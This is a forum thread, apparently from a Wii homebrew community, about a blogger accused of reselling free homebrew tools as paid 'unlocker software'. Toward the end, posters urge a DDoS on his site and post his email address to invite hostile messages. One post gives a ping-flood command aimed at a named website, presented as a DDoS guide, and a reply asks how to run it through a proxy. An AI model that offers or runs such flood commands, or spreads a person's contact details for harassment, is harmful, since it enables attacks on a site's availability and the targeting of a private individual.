Just doin ma job.

I freaked out on this dudes blogspot because he had made a guide full of fail promoting unlocking software. The fun starts here.

I freaked out while surfing the web.

That's his blog, not the guide itself, and I felt inclined to post 2 comments about it. And I think people know who I am by now so you know what to expect. =p

Wow, hopefully people don't feel offended by your comments and shy away from Wiibrew.

Anyway, that guide was terrible! Selling the old Homebrew Channel Installer, Twilight Hack, Homebrew Browser, and some USB Loader for $30? Not to mention, he copied the instructions for the Twilight Hack directly from wiibrew.org.

Reported to the SIIA, hopefully they will help.

Uhhh, sorry, but is he selling anything?
Free fail guides are so common and old...

He just looks like a noob trying to impress his buddies with his website :P

Hm, his blog post said about 2 weeks ago, so I doubt it's THAT old.

I wasn't talking about the guide itself, but rather about all the fail guides in the world. There loads of them around the internet, since a long time ago.

Does that guy, of this guide, sell anything that he didn't created? No? So whatever...
(But since that guide is hosted at Google, and Google is against piracy apology, yeah, that guy has some trouble =P)

Yeah, but he certainly is/was promoting it. I hadn't heard of those 2 fail products until i happened upon that guide. Stumble Upon showed me that page. It IS useful.....sometimes.

he is promoting piracy and he is selling the HBC under "brewii unlocker software",

google wont take any action against him, twiizers has to do that (google's policy) all google will do is note that it contains pirated content. (Look up "wii wads" in google and see if you find an illegal site). For google/blogspot to remove it some official organization has to brand it as illegal and then it would be removed from google.

That would be silly, you could get in trouble. Why take the risk?

Obviously he does not check his blog as a few of you have posted on it.

The blogger(er?) has just deleted all of the comments left by us, disabled commenting on his blog, and added a new post on his blog claiming the only way to get the homebrew channel is to buy and install his software.

DDOS away SteelSlasher.

Edit: Can't comment? How about a nasty e-mail? His e-mail address is Kasperknop@gmail.com

Distributed Denial Of Service. a load of computers start visiting his site all at once, jamming up the bandwidth and preventing anyone else from using the site.

Here is my DDOS guide for everyone who hates this guy:

put this in the cmd prompt:

ping -t [www.howtomodyourwii.com] -l 65500 -n 1000000

-l = send buffer packet
-n = send echo request to victim
-t = Ping the specified host until stopped.
To see statistics and continue - type Control-Break; (the break button is also the pause button)
To stop - hit Control+C.

It doesnt take any of your bandwidth or CPU power but since there is no proxy involved you are legally vulnerable,

Well, if that's illegal I dont think its a good idea. How would you go about doing it through a proxy, just out of interest? (I have no interest in combating illegal activity with illegal activity, but I'd like to know anyway, just for interest's sake)
